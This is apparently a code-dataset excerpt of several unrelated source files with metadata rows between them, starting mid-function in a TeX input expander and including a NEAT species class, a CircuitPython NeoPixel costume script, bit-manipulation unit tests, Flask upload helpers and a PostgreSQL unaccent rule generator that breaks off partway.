        # Expand the input by reading in the expanded text in the input file.
        discovery_strategy = (
            FileDiscoveryStrategy.INCLUDE
            if match.pattern in include_patterns
            else FileDiscoveryStrategy.INPUT
        )
        # Recursive call: nested \input/\include macros are expanded depth-first.
        input_tex = expand_tex(
            # All inputs from expanded files will be resolved relative to the main
            # directory of the project (i.e., the one where the TeX executable is invoked):
            # https://tex.stackexchange.com/a/39084/198728
            tex_dir,
            input_path,
            discover_by=discovery_strategy,
            is_input=True,
            # Specify the 'within' parameter to make sure that all expanded files reside
            # in the directory where the main TeX file was expanded.
            within=within,
        )
        if input_tex is None:
            logging.warning(  # pylint: disable=logging-not-lazy
                "Could not read input TeX file %s included from file %s in directory %s. "
                + "This input macro will not be expanded.",
                input_path,
                tex_name,
                tex_dir,
            )
            continue
        if match.pattern in include_patterns:
            input_tex = INCLUDE_EXPANSION.replace("<CONTENTS>", input_tex)
            input_tex = input_tex.replace("<FILENAME>", input_path)
        replacements.append(Expansion(start=match.start, end=match.end, tex=input_tex))
    # Apply the expansions to the TeX.
    expanded = tex
    if end_file_at is not None:
        expanded = expanded[:end_file_at]
    for replacement in reversed(replacements):
        # Skip edits that fall after an \endinput truncation point.
        if end_file_at is not None and replacement.start > end_file_at:
            continue
        if isinstance(replacement, EndInput):
            expanded = expanded[: replacement.start] + "" + expanded[replacement.end :]
            continue
        if isinstance(replacement, Expansion):
            expanded = (
                expanded[: replacement.start]
                + replacement.tex
                + expanded[replacement.end :]
            )
    return expanded
| 42.151786 | 102 | 0.643508 |
acfb487fedc316e608be6c216e137a7eddf6576f | 42 | py | Python | api/src/function/control/deskFunction.py | SamuelJansen/Application | 6ab3202fb7de12782510f477a3e74d8800ea2927 | [
"MIT"
] | null | null | null | api/src/function/control/deskFunction.py | SamuelJansen/Application | 6ab3202fb7de12782510f477a3e74d8800ea2927 | [
"MIT"
] | null | null | null | api/src/function/control/deskFunction.py | SamuelJansen/Application | 6ab3202fb7de12782510f477a3e74d8800ea2927 | [
"MIT"
] | null | null | null | class Attribute:
FIRST_NAME = 'Desk'
| 10.5 | 23 | 0.666667 |
acfb49ec164c07b830fba34a2f18493bf6ef1945 | 2,171 | py | Python | species.py | polowis/neatevo | 165bbf81b2f55a85c945aed9cc6a817ee51ad476 | [
"MIT"
] | null | null | null | species.py | polowis/neatevo | 165bbf81b2f55a85c945aed9cc6a817ee51ad476 | [
"MIT"
] | null | null | null | species.py | polowis/neatevo | 165bbf81b2f55a85c945aed9cc6a817ee51ad476 | [
"MIT"
] | null | null | null | from network import Network
import math
class Species:
    """One member of a NEAT-style population.

    Wraps a phenotype Network built from ``model`` and tracks the
    member's fitness and score.  ``flatten``/``set_genes`` convert the
    network's weights to and from a flat gene list for crossover and
    mutation.
    """

    def __init__(self, model):
        self.model = model
        # The phenotype network; its layers are evaluated in order.
        self.nn = self.generate_network()
        self.fitness = 0
        self.score = 0

    def generate_network(self):
        """Build the phenotype network for this species' model."""
        return Network(self.model)

    def feed_forward(self):
        """Propagate the current input values through the network."""
        self.nn.feed_forward()

    def flatten(self):
        """Return all weights as a flat gene list.

        For each non-output layer: every node's weights in order,
        followed by that layer's bias weights.  ``set_genes`` consumes
        genes in exactly this order.
        """
        genes = []
        for i in range(len(self.nn.layers) - 1):
            for node in self.nn.layers[i].nodes:
                genes.extend(node.weights)
            genes.extend(self.nn.layers[i].bias.weights)
        return genes

    def set_genes(self, genes: list):
        """Load a flat gene list (as produced by ``flatten``) back into
        the network's weights.

        Bug fix: the original evaluated ``genes[slice(0, 1)]`` without
        assigning the result, so the gene list was never consumed and
        every weight received ``genes[0]``.  A running index now walks
        the list in ``flatten`` order.
        """
        index = 0
        for i in range(len(self.nn.layers) - 1):
            for node in self.nn.layers[i].nodes:
                for e in range(len(node.weights)):
                    node.weights[e] = genes[index]
                    index += 1
            bias_weights = self.nn.layers[i].bias.weights
            for w in range(len(bias_weights)):
                bias_weights[w] = genes[index]
                index += 1

    def observe(self, ins):
        """Feed the observation values into the input layer."""
        self.nn.layers[0].set_value(ins)

    def think(self):
        """Return the index of the output node with the highest value.

        Bug fix: the original never updated ``_max`` and assigned the
        node's *value* to ``index``, so it effectively returned the last
        output node's value instead of the argmax index.
        """
        best_index = -1
        best_value = float('-inf')
        for i, node in enumerate(self.nn.layers[-1].nodes):
            if node.value > best_value:
                best_value = node.value
                best_index = i
        return best_index
| 35.016129 | 124 | 0.543068 |
acfb4b03540aac233bff61ae4d054967b985175f | 8,520 | py | Python | tests/test_bit.py | nisaruj/algorithms | 1e03cd259c2d7ada113eb99843dcada9f20adf54 | [
"MIT"
] | 6 | 2018-12-12T09:14:05.000Z | 2019-04-29T22:07:28.000Z | tests/test_bit.py | nisaruj/algorithms | 1e03cd259c2d7ada113eb99843dcada9f20adf54 | [
"MIT"
] | null | null | null | tests/test_bit.py | nisaruj/algorithms | 1e03cd259c2d7ada113eb99843dcada9f20adf54 | [
"MIT"
] | 7 | 2019-03-21T10:18:22.000Z | 2021-09-22T07:34:10.000Z | from algorithms.bit import (
add_bitwise_operator,
count_ones_iter, count_ones_recur,
count_flips_to_convert,
find_missing_number, find_missing_number2,
flip_bit_longest_seq,
is_power_of_two,
reverse_bits,
single_number,
single_number2,
single_number3,
subsets,
get_bit, set_bit, clear_bit, update_bit,
swap_pair,
find_difference,
has_alternative_bit, has_alternative_bit_fast,
insert_one_bit, insert_mult_bits,
remove_bit,
binary_gap
)
import unittest
import random
class TestSuite(unittest.TestCase):
    """Unit tests for the bit-manipulation algorithms.

    Binary representations of the inputs are given in comments so the
    expected counts/positions can be checked by eye.
    """
    def setUp(self):
        """Initialize seed."""
        # Fixed seed keeps the randomized tests reproducible.
        random.seed("test")
    def test_add_bitwise_operator(self):
        self.assertEqual(5432 + 97823, add_bitwise_operator(5432, 97823))
        self.assertEqual(0, add_bitwise_operator(0, 0))
        self.assertEqual(10, add_bitwise_operator(10, 0))
        self.assertEqual(10, add_bitwise_operator(0, 10))
    def test_count_ones_recur(self):
        # 8 -> 1000
        self.assertEqual(1, count_ones_recur(8))
        # 109 -> 1101101
        self.assertEqual(5, count_ones_recur(109))
        # 63 -> 111111
        self.assertEqual(6, count_ones_recur(63))
        # 0 -> 0
        self.assertEqual(0, count_ones_recur(0))
    def test_count_ones_iter(self):
        # 8 -> 1000
        self.assertEqual(1, count_ones_iter(8))
        # 109 -> 1101101
        self.assertEqual(5, count_ones_iter(109))
        # 63 -> 111111
        self.assertEqual(6, count_ones_iter(63))
        # 0 -> 0
        self.assertEqual(0, count_ones_iter(0))
    def test_count_flips_to_convert(self):
        # 29: 11101 and 15: 01111
        self.assertEqual(2, count_flips_to_convert(29, 15))
        # 45: 0000101101 and 987: 1111011011
        self.assertEqual(8, count_flips_to_convert(45, 987))
        # 34: 100010
        self.assertEqual(0, count_flips_to_convert(34, 34))
        # 34: 100010 and 53: 110101
        self.assertEqual(4, count_flips_to_convert(34, 53))
    def test_find_missing_number(self):
        self.assertEqual(7, find_missing_number([4, 1, 3, 0, 6, 5, 2]))
        self.assertEqual(0, find_missing_number([1]))
        self.assertEqual(1, find_missing_number([0]))
        # Large randomized case: 0..99999 with 12345 removed.
        nums = [i for i in range(100000) if i != 12345]
        random.shuffle(nums)
        self.assertEqual(12345, find_missing_number(nums))
    def test_find_missing_number2(self):
        self.assertEqual(7, find_missing_number2([4, 1, 3, 0, 6, 5, 2]))
        self.assertEqual(0, find_missing_number2([1]))
        self.assertEqual(1, find_missing_number2([0]))
        # Same large randomized case as above for the alternate algorithm.
        nums = [i for i in range(100000) if i != 12345]
        random.shuffle(nums)
        self.assertEqual(12345, find_missing_number2(nums))
    def test_flip_bit_longest_seq(self):
        # 1775: 11011101111
        self.assertEqual(8, flip_bit_longest_seq(1775))
        # 5: 101
        self.assertEqual(3, flip_bit_longest_seq(5))
        # 71: 1000111
        self.assertEqual(4, flip_bit_longest_seq(71))
        # 0: 0
        self.assertEqual(1, flip_bit_longest_seq(0))
    def test_is_power_of_two(self):
        self.assertTrue(is_power_of_two(64))
        self.assertFalse(is_power_of_two(91))
        self.assertTrue(is_power_of_two(2**1001))
        self.assertTrue(is_power_of_two(1))
        self.assertFalse(is_power_of_two(0))
    def test_reverse_bits(self):
        self.assertEqual(43261596, reverse_bits(964176192))
        self.assertEqual(964176192, reverse_bits(43261596))
        self.assertEqual(1, reverse_bits(2147483648))
        # bin(0) => 00000000000000000000000000000000
        self.assertEqual(0, reverse_bits(0))
        # bin(2**32 - 1) => 11111111111111111111111111111111
        self.assertEqual(2**32 - 1, reverse_bits(2**32 - 1))
    def test_single_number(self):
        random.seed('test')
        self.assertEqual(0, single_number([1, 0, 2, 1, 2, 3, 3]))
        self.assertEqual(101, single_number([101]))
        single = random.randint(1, 100000)
        nums = [random.randint(1, 100000) for _ in range(1000)]
        nums *= 2  # nums contains pairs of random integers
        nums.append(single)
        random.shuffle(nums)
        self.assertEqual(single, single_number(nums))
    def test_single_number2(self):
        self.assertEqual(3, single_number2([4, 2, 3, 2, 1, 1, 4, 2, 4, 1]))
        single = random.randint(1, 100000)
        nums = [random.randint(1, 100000) for _ in range(1000)]
        nums *= 3  # nums contains triplets of random integers
        nums.append(single)
        random.shuffle(nums)
        self.assertEqual(single, single_number2(nums))
    def test_single_number3(self):
        self.assertEqual(sorted([2,5]),
                         sorted(single_number3([2, 1, 5, 6, 6, 1])))
        self.assertEqual(sorted([4,3]),
                         sorted(single_number3([9, 9, 4, 3])))
    def test_subsets(self):
        self.assertSetEqual(subsets([1, 2, 3]),
                            {(), (1,), (2,), (3,), (1, 2), (1, 3), (2, 3), (1, 2, 3)})
        self.assertSetEqual(subsets([10, 20, 30, 40]),
                            {(10, 40), (10, 20, 40), (10, 30), (10, 20, 30, 40), (40,),
                             (10, 30, 40), (30,), (20, 30), (30, 40), (10,), (),
                             (10, 20), (20, 40), (20, 30, 40), (10, 20, 30), (20,)})
    def test_get_bit(self):
        # 22 = 10110
        self.assertEqual(1, get_bit(22, 2))
        self.assertEqual(0, get_bit(22, 3))
    def test_set_bit(self):
        # 22 = 10110 --> after set bit at 3th position: 30 = 11110
        self.assertEqual(30, set_bit(22, 3))
    def test_clear_bit(self):
        # 22 = 10110 --> after clear bit at 2nd position: 20 = 10010
        self.assertEqual(18, clear_bit(22, 2))
    def test_update_bit(self):
        # 22 = 10110 --> after update bit at 3th position with value 1: 30 = 11110
        self.assertEqual(30, update_bit(22, 3, 1))
        # 22 = 10110 --> after update bit at 2nd position with value 0: 20 = 10010
        self.assertEqual(18, update_bit(22, 2, 0))
    def test_swap_pair(self):
        # 22: 10110 --> 41: 101001
        self.assertEqual(41, swap_pair(22))
        # 10: 1010 --> 5 : 0101
        self.assertEqual(5, swap_pair(10))
    def test_find_difference(self):
        self.assertEqual('e', find_difference("abcd", "abecd"))
    def test_has_alternative_bit(self):
        self.assertTrue(has_alternative_bit(5))
        self.assertFalse(has_alternative_bit(7))
        self.assertFalse(has_alternative_bit(11))
        self.assertTrue(has_alternative_bit(10))
    def test_has_alternative_bit_fast(self):
        self.assertTrue(has_alternative_bit_fast(5))
        self.assertFalse(has_alternative_bit_fast(7))
        self.assertFalse(has_alternative_bit_fast(11))
        self.assertTrue(has_alternative_bit_fast(10))
    def test_insert_one_bit(self):
        """
        Input: num = 10101 (21)
        insert_one_bit(num, 1, 2): 101101 (45)
        insert_one_bit(num, 0 ,2): 101001 (41)
        insert_one_bit(num, 1, 5): 110101 (53)
        insert_one_bit(num, 1, 0): 101010 (42)
        """
        self.assertEqual(45, insert_one_bit(21, 1, 2))
        self.assertEqual(41, insert_one_bit(21, 0, 2))
        self.assertEqual(53, insert_one_bit(21, 1, 5))
        self.assertEqual(43, insert_one_bit(21, 1, 0))
    def test_insert_mult_bits(self):
        """
        Input: num = 101 (5)
        insert_mult_bits(num, 7, 3, 1): 101111 (47)
        insert_mult_bits(num, 7, 3, 0): 101111 (47)
        insert_mult_bits(num, 7, 3, 3): 111101 (61)
        """
        self.assertEqual(47, insert_mult_bits(5, 7, 3, 1))
        self.assertEqual(47, insert_mult_bits(5, 7, 3, 0))
        self.assertEqual(61, insert_mult_bits(5, 7, 3, 3))
    def test_remove_bit(self):
        """
        Input: num = 10101 (21)
        remove_bit(num, 2): output = 1001 (9)
        remove_bit(num, 4): output = 101 (5)
        remove_bit(num, 0): output = 1010 (10)
        """
        self.assertEqual(9, remove_bit(21, 2))
        self.assertEqual(5, remove_bit(21, 4))
        self.assertEqual(10, remove_bit(21, 0))
    def test_binary_gap(self):
        # 22 = 10110
        self.assertEqual(2, binary_gap(22))
        # 6 = 110
        self.assertEqual(1, binary_gap(6))
        # 8 = 1000
        self.assertEqual(0, binary_gap(8))
        # 145 = 10010001
        self.assertEqual(4, binary_gap(145))
# Allow running this test module directly: python test_bit.py
if __name__ == '__main__':
    unittest.main()
| 33.411765 | 87 | 0.608803 |
acfb4dedc660f50cb731ffe15046d0f8ba4f571b | 905 | py | Python | app/controllers.py | overclock07/info3180-Project2 | 44c28ccd6d006aa488daf718953f44c64c444f4d | [
"MIT"
] | null | null | null | app/controllers.py | overclock07/info3180-Project2 | 44c28ccd6d006aa488daf718953f44c64c444f4d | [
"MIT"
] | null | null | null | app/controllers.py | overclock07/info3180-Project2 | 44c28ccd6d006aa488daf718953f44c64c444f4d | [
"MIT"
] | null | null | null | from .models import Users
import os
from .forms import ALLOWED_EXTENSIONS
# Here we define a function to collect form errors from Flask-WTF
# which we can later use
def form_errors(form):
    """Collect Flask-WTF validation errors into a list of readable messages.

    Each message has the form "Error in the <label> field - <error>".
    """
    messages = []
    for field_name, field_errors in form.errors.items():
        field_label = getattr(form, field_name).label.text
        for error in field_errors:
            messages.append(u"Error in the %s field - %s" % (field_label, error))
    return messages
def allowed_file(filename):
    # True when the name contains a dot and its (lowercased) final
    # extension is in the ALLOWED_EXTENSIONS whitelist from .forms.
    return '.' in filename and \
        filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
def get_uploaded_images(user_URI):
    # Walk the user's upload directory (user_URI with its first and last
    # character stripped, joined under the working directory) and return
    # the last two path components of a found file as "dir/file".
    #
    # NOTE(review): despite the plural name only ONE path is returned --
    # ls is overwritten on every file, so the last file walked wins; and
    # if the walk finds no files, ls is never bound and the final join
    # raises UnboundLocalError.  The '/' split also assumes POSIX paths.
    # Confirm the intended contract before changing callers.
    rootdir = os.getcwd()
    for subdir,dirs,files in os.walk(rootdir +user_URI[1:-1]):
        for file in files:
            ls=os.path.join(subdir,file).split('/')[-2:]
    return '/'.join(ls)
acfb4e239156aa6e995d2359883ac12e19c2704b | 3,366 | py | Python | HalloWing/main.py | Dthurow/CyberpunkCostumeCode | 881d064ca005ef708d82c07cc1395e196294139c | [
"MIT"
] | null | null | null | HalloWing/main.py | Dthurow/CyberpunkCostumeCode | 881d064ca005ef708d82c07cc1395e196294139c | [
"MIT"
] | null | null | null | HalloWing/main.py | Dthurow/CyberpunkCostumeCode | 881d064ca005ef708d82c07cc1395e196294139c | [
"MIT"
] | null | null | null | import time
import board
import neopixel
import audioio
import touchio
# On CircuitPlayground Express, and boards with built in status NeoPixel -> board.NEOPIXEL
# Otherwise choose an open pin connected to the Data In of the NeoPixel strip, i.e. board.D1
pixel_pin = board.EXTERNAL_NEOPIXEL
#color standards
RED = 0x100000
YELLOW = (0x10, 0x10, 0)
GREEN = (0, 0x10, 0)
AQUA = (0, 0x10, 0x10)
BLUE = (0, 0, 0x10)
PURPLE = (0x10, 0, 0x10)
BLACK = (0, 0, 0)
# The number of NeoPixels
num_pixels = 30
# The order of the pixel colors - RGB or GRB. Some NeoPixels have red and green reversed!
# For RGBW NeoPixels, simply change the ORDER to RGBW or GRBW.
ORDER = neopixel.GRB
#set the left and right touch sensors
touch1 = touchio.TouchIn(board.A2)
touch2 = touchio.TouchIn(board.A5)
#set the speaker
AUDIO = audioio.AudioOut(board.A0) # Speaker
pixels = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=0.2, auto_write=False,
pixel_order=ORDER)
def play_wav(name, loop=False):
    """
    Play a WAV file in the 'sounds' directory.
    @param name: partial file name string, complete name will be built around
                 this, e.g. passing 'foo' will play file 'sounds/foo.wav'.
    @param loop: if True, sound will repeat indefinitely (until interrupted
                 by another sound).
    """
    try:
        # The file handle is intentionally left open: AUDIO streams from
        # it while playback continues, so closing it here would cut the
        # sound off.
        wave_file = open('Sounds/' + name + '.wav', 'rb')
        wave = audioio.WaveFile(wave_file)
        AUDIO.play(wave, loop=loop)
    except Exception:
        # Best effort: a missing or corrupt sound file must not crash the
        # costume.  Narrowed from a bare ``except:`` so KeyboardInterrupt
        # and SystemExit still propagate.
        return
def color_chase(color, wait):
    """Set every pixel to color one at a time, pausing wait seconds
    between pixels, then push the result to the strip."""
    for index in range(num_pixels):
        pixels[index] = color
        time.sleep(wait)
    pixels.show()
def wheel(pos):
    """Map 0-255 onto the r -> g -> b -> r color wheel.

    Out-of-range positions yield black.  The tuple arity follows the
    strip's configured pixel ORDER (3 channels for RGB/GRB, 4 otherwise).
    """
    if pos < 0 or pos > 255:
        r = g = b = 0
    elif pos < 85:
        r, g, b = int(pos * 3), int(255 - pos * 3), 0
    elif pos < 170:
        pos -= 85
        r, g, b = int(255 - pos * 3), 0, int(pos * 3)
    else:
        pos -= 170
        r, g, b = 0, int(pos * 3), int(255 - pos * 3)
    if ORDER == neopixel.RGB or ORDER == neopixel.GRB:
        return (r, g, b)
    return (r, g, b, 0)
def off(audioOff=True):
    """Blank the whole strip; optionally also stop any playing audio."""
    pixels.fill(BLACK)
    pixels.show()
    if audioOff and AUDIO.playing:
        AUDIO.stop()
def partyRainbow():
    """One party-mode frame: keep the music going while chasing rainbow
    colors across the even pixels, then across the odd pixels."""
    playMusic()
    for offset in (0, 1):
        for i in range(offset, num_pixels, 2):
            pixels[i] = wheel((i * 256 // num_pixels) & 255)
            pixels.show()
            time.sleep(.1)
        off(False)
        time.sleep(.1)
def flash():
    """Blink the whole strip green once: 0.2 s on, then 0.2 s off."""
    pixels.fill(GREEN)
    pixels.show()
    time.sleep(.2)
    off(False)
    time.sleep(.2)
def playMusic():
    # Start the background track only if nothing is already playing;
    # otherwise calling play_wav every animation frame would restart it.
    if not AUDIO.playing:
        play_wav("Monplaisir_-_04_-_Level_1")
def colorChase():
    # One frame of the aqua chase animation, then blank strip and audio.
    color_chase(AQUA, .2)
    off()
# Selectable animation modes, cycled through with the first touch pad.
StateList = [colorChase, flash, partyRainbow]
CurState = 0
RunStates = False
# Main event loop: touch pad 1 advances to the next animation, touch pad 2
# toggles the animations on/off; while off, everything stays dark/silent.
while True:
    if (touch1.value):
        CurState = (CurState + 1)% len(StateList)
        off()
    if (touch2.value):
        RunStates = not RunStates
    if RunStates:
        StateList[CurState]()
    else:
        off()
    # Debounce delay so one touch does not register multiple times.
    time.sleep(.2)
acfb4f0b6868d280dc35e8062ef53c204d6534b7 | 13,142 | py | Python | contrib/unaccent/generate_unaccent_rules.py | g0djan/postgres | 741b1aaf61a3da10250555f827c0a7a2f9bc2822 | [
"PostgreSQL"
] | 3 | 2020-12-31T10:40:25.000Z | 2021-06-04T09:12:05.000Z | contrib/unaccent/generate_unaccent_rules.py | g0djan/postgres | 741b1aaf61a3da10250555f827c0a7a2f9bc2822 | [
"PostgreSQL"
] | 1 | 2019-11-19T03:46:25.000Z | 2019-11-19T04:56:17.000Z | contrib/unaccent/generate_unaccent_rules.py | g0djan/postgres | 741b1aaf61a3da10250555f827c0a7a2f9bc2822 | [
"PostgreSQL"
] | 1 | 2020-07-27T07:31:27.000Z | 2020-07-27T07:31:27.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# This script builds unaccent.rules on standard output when given the
# contents of UnicodeData.txt [1] and Latin-ASCII.xml [2] given as
# arguments. Optionally includes ligature expansion and Unicode CLDR
# Latin-ASCII transliterator, enabled by default, this can be disabled
# with "--no-ligatures-expansion" command line option.
#
# The approach is to use the Unicode decomposition data to identify
# precomposed codepoints that are equivalent to a ligature of several
# letters, or a base letter with any number of diacritical marks.
#
# This approach handles most letters with diacritical marks and some
# ligatures. However, several characters (notably a majority of
# ligatures) don't have decomposition. To handle all these cases, one can
# use a standard Unicode transliterator available in Common Locale Data
# Repository (CLDR): Latin-ASCII. This transliterator associates Unicode
# characters to ASCII-range equivalent. Unless "--no-ligatures-expansion"
# option is enabled, the XML file of this transliterator [2] -- given as a
# command line argument -- will be parsed and used.
#
# Ideally you should use the latest release for each data set. For
# Latin-ASCII.xml, the latest data sets released can be browsed directly
# via [3]. Note that this script is compatible with at least release 29.
#
# [1] https://www.unicode.org/Public/8.0.0/ucd/UnicodeData.txt
# [2] https://raw.githubusercontent.com/unicode-org/cldr/release-34/common/transforms/Latin-ASCII.xml
# [3] https://github.com/unicode-org/cldr/tags
# BEGIN: Python 2/3 compatibility - remove when Python 2 compatibility dropped
# The approach is to be Python3 compatible with Python2 "backports".
from __future__ import print_function
from __future__ import unicode_literals
# END: Python 2/3 compatibility - remove when Python 2 compatibility dropped

import argparse
import codecs
import re
import sys
import xml.etree.ElementTree as ET

# BEGIN: Python 2/3 compatibility - remove when Python 2 compatibility dropped
if sys.version_info[0] <= 2:
    # Encode stdout as UTF-8, so we can just print to it
    sys.stdout = codecs.getwriter('utf8')(sys.stdout)

    # Map Python 2's chr to unichr
    chr = unichr

    # Python 2 and 3 compatible bytes call
    def bytes(source, encoding='ascii', errors='strict'):
        return source.encode(encoding=encoding, errors=errors)
else:
# END: Python 2/3 compatibility - remove when Python 2 compatibility dropped
    # Python 3: wrap the underlying binary buffer so print() always emits UTF-8
    sys.stdout = codecs.getwriter('utf8')(sys.stdout.buffer)
# The ranges of Unicode characters that we consider to be "plain letters".
# For now we are being conservative by including only Latin and Greek. This
# could be extended in future based on feedback from people with relevant
# language knowledge.  Each range is inclusive at both ends.
PLAIN_LETTER_RANGES = ((ord('a'), ord('z')),  # Latin lower case
                       (ord('A'), ord('Z')),  # Latin upper case
                       (0x03b1, 0x03c9),  # GREEK SMALL LETTER ALPHA, GREEK SMALL LETTER OMEGA
                       (0x0391, 0x03a9))  # GREEK CAPITAL LETTER ALPHA, GREEK CAPITAL LETTER OMEGA

# Combining marks follow a "base" character, and result in a composite
# character. Example: "U&'A\0300'" produces "À". There are three types of
# combining marks: enclosing (Me), non-spacing combining (Mn), spacing
# combining (Mc). We identify the ranges of marks we feel safe removing.
# References:
# https://en.wikipedia.org/wiki/Combining_character
# https://www.unicode.org/charts/PDF/U0300.pdf
# https://www.unicode.org/charts/PDF/U20D0.pdf
COMBINING_MARK_RANGES = ((0x0300, 0x0362),  # Mn: Accents, IPA
                         (0x20dd, 0x20E0),  # Me: Symbols
                         (0x20e2, 0x20e4),)  # Me: Screen, keycap, triangle
def print_record(codepoint, letter):
    """Emit one unaccent.rules line: the source character, optionally followed
    by a TAB and its replacement string."""
    suffix = "\t" + letter if letter else ""
    print(chr(codepoint) + suffix)
class Codepoint:
    """One UnicodeData.txt entry: the codepoint value, its general category,
    and the codepoints of its decomposition (empty list when none)."""

    def __init__(self, id, general_category, combining_ids):
        self.id = id
        self.general_category = general_category
        self.combining_ids = combining_ids
def is_mark_to_remove(codepoint):
    """Return true if this is a combining mark to remove."""
    # Only combining marks are candidates; then consult the hand-picked ranges.
    if not is_mark(codepoint):
        return False

    return any(start <= codepoint.id <= stop
               for start, stop in COMBINING_MARK_RANGES)
def is_plain_letter(codepoint):
    """Return true if codepoint represents a "plain letter"."""
    return any(low <= codepoint.id <= high
               for low, high in PLAIN_LETTER_RANGES)
def is_mark(codepoint):
    """Returns true for diacritical marks (combining codepoints)."""
    # Mn = non-spacing, Me = enclosing, Mc = spacing combining
    return codepoint.general_category in {"Mn", "Me", "Mc"}
def is_letter_with_marks(codepoint, table):
    """Returns true for letters combined with one or more marks."""
    # See https://www.unicode.org/reports/tr44/tr44-14.html#General_Category_Values

    # A single-element decomposition means the letter carries no marks.
    if len(codepoint.combining_ids) == 1:
        return False

    # At least one of the trailing decomposition members must be a mark.
    has_mark = any(is_mark(table[i]) for i in codepoint.combining_ids[1:])
    if not has_mark:
        return False

    # The first member must itself reduce to a (possibly marked) letter.
    base = codepoint.combining_ids[0]
    return is_plain_letter(table[base]) or is_letter_with_marks(table[base], table)
def is_letter(codepoint, table):
    """Return true for letter with or without diacritical marks."""
    if is_plain_letter(codepoint):
        return True
    return is_letter_with_marks(codepoint, table)
def get_plain_letter(codepoint, table):
    """Return the base codepoint without marks. If this codepoint has more
    than one combining character, do a recursive lookup on the table to
    find out its plain base letter."""
    if is_letter_with_marks(codepoint, table):
        if len(table[codepoint.combining_ids[0]].combining_ids) > 1:
            # The base is itself precomposed: recurse down to the real base letter
            return get_plain_letter(table[codepoint.combining_ids[0]], table)
        elif is_plain_letter(table[codepoint.combining_ids[0]]):
            return table[codepoint.combining_ids[0]]

        # Should not come here
        assert(False)
    elif is_plain_letter(codepoint):
        return codepoint

    # Should not come here
    assert(False)
def is_ligature(codepoint, table):
    """Return true for letters combined with letters."""
    for component in codepoint.combining_ids:
        if not is_letter(table[component], table):
            return False
    return True
def get_plain_letters(codepoint, table):
    """Return a list of plain letters from a ligature."""
    assert(is_ligature(codepoint, table))
    letters = []
    for component in codepoint.combining_ids:
        letters.append(get_plain_letter(table[component], table))
    return letters
def parse_cldr_latin_ascii_transliterator(latinAsciiFilePath):
    """Parse the XML file and return a set of tuples (src, trg), where "src"
    is the original character and "trg" the substitute."""
    charactersSet = set()

    # RegEx to parse rules; \u2192 is the RIGHTWARDS ARROW separating src from trg
    rulePattern = re.compile(r'^(?:(.)|(\\u[0-9a-fA-F]{4})) \u2192 (?:\'(.+)\'|(.+)) ;')

    # construct tree from XML
    transliterationTree = ET.parse(latinAsciiFilePath)
    transliterationTreeRoot = transliterationTree.getroot()

    # Fetch all the transliteration rules. Since release 29 of Latin-ASCII.xml
    # all the transliteration rules are located in a single tRule block with
    # all rules separated into separate lines.
    blockRules = transliterationTreeRoot.findall("./transforms/transform/tRule")
    assert(len(blockRules) == 1)

    # Split the block of rules into one element per line.
    rules = blockRules[0].text.splitlines()

    # And finish the processing of each individual rule.
    for rule in rules:
        matches = rulePattern.search(rule)

        # The regular expression capture four groups corresponding
        # to the characters.
        #
        # Group 1: plain "src" char. Empty if group 2 is not.
        # Group 2: unicode-escaped "src" char (e.g. "\u0110"). Empty if group 1 is not.
        #
        # Group 3: plain "trg" char. Empty if group 4 is not.
        # Group 4: plain "trg" char between quotes. Empty if group 3 is not.
        if matches is not None:
            src = matches.group(1) if matches.group(1) is not None else bytes(matches.group(2), 'UTF-8').decode('unicode-escape')
            trg = matches.group(3) if matches.group(3) is not None else matches.group(4)

            # "'" and """ are escaped
            trg = trg.replace("\\'", "'").replace('\\"', '"')

            # the parser of unaccent only accepts non-whitespace characters
            # for "src" and "trg" (see unaccent.c)
            if not src.isspace() and not trg.isspace():
                charactersSet.add((ord(src), trg))

    return charactersSet
def special_cases():
    """Returns the special cases which are not handled by other methods"""
    # Hand-maintained pairs whose decomposition data is missing or unsuitable
    # for the generic algorithms above.
    return {
        # Cyrillic
        (0x0401, u"\u0415"),  # CYRILLIC CAPITAL LETTER IO
        (0x0451, u"\u0435"),  # CYRILLIC SMALL LETTER IO

        # Symbols of "Letterlike Symbols" Unicode Block (U+2100 to U+214F)
        (0x2103, u"\xb0C"),   # DEGREE CELSIUS
        (0x2109, u"\xb0F"),   # DEGREE FAHRENHEIT
        (0x2117, "(P)"),      # SOUND RECORDING COPYRIGHT
    }
def main(args):
    """Read UnicodeData.txt (and optionally Latin-ASCII.xml), then print the
    unaccent.rules mappings to stdout."""
    # https://www.unicode.org/reports/tr44/tr44-14.html#Character_Decomposition_Mappings
    decomposition_type_pattern = re.compile(" *<[^>]*> *")

    table = {}
    all = []

    # unordered set for ensure uniqueness
    charactersSet = set()

    # read file UnicodeData.txt
    with codecs.open(
            args.unicodeDataFilePath, mode='r', encoding='UTF-8',
            ) as unicodeDataFile:
        # read everything we need into memory
        for line in unicodeDataFile:
            fields = line.split(";")
            if len(fields) > 5:
                # https://www.unicode.org/reports/tr44/tr44-14.html#UnicodeData.txt
                general_category = fields[2]
                decomposition = fields[5]
                # strip the "<compat>"-style decomposition type tag, if any
                decomposition = re.sub(decomposition_type_pattern, ' ', decomposition)
                id = int(fields[0], 16)
                combining_ids = [int(s, 16) for s in decomposition.split(" ") if s != ""]
                codepoint = Codepoint(id, general_category, combining_ids)
                table[id] = codepoint
                all.append(codepoint)

    # walk through all the codepoints looking for interesting mappings
    for codepoint in all:
        if codepoint.general_category.startswith('L') and \
           len(codepoint.combining_ids) > 1:
            if is_letter_with_marks(codepoint, table):
                charactersSet.add((codepoint.id,
                                   chr(get_plain_letter(codepoint, table).id)))
            elif args.noLigaturesExpansion is False and is_ligature(codepoint, table):
                charactersSet.add((codepoint.id,
                                   "".join(chr(combining_codepoint.id)
                                           for combining_codepoint \
                                           in get_plain_letters(codepoint, table))))
        elif is_mark_to_remove(codepoint):
            # marks map to nothing: they are simply removed
            charactersSet.add((codepoint.id, None))

    # add CLDR Latin-ASCII characters
    if not args.noLigaturesExpansion:
        charactersSet |= parse_cldr_latin_ascii_transliterator(args.latinAsciiFilePath)

    charactersSet |= special_cases()

    # sort for more convenient display
    charactersList = sorted(charactersSet, key=lambda characterPair: characterPair[0])

    for characterPair in charactersList:
        print_record(characterPair[0], characterPair[1])
if __name__ == "__main__":
    # Command line interface: --unicode-data-file is always required;
    # --latin-ascii-file is required unless ligature expansion is disabled.
    parser = argparse.ArgumentParser(description='This script builds unaccent.rules on standard output when given the contents of UnicodeData.txt and Latin-ASCII.xml given as arguments.')
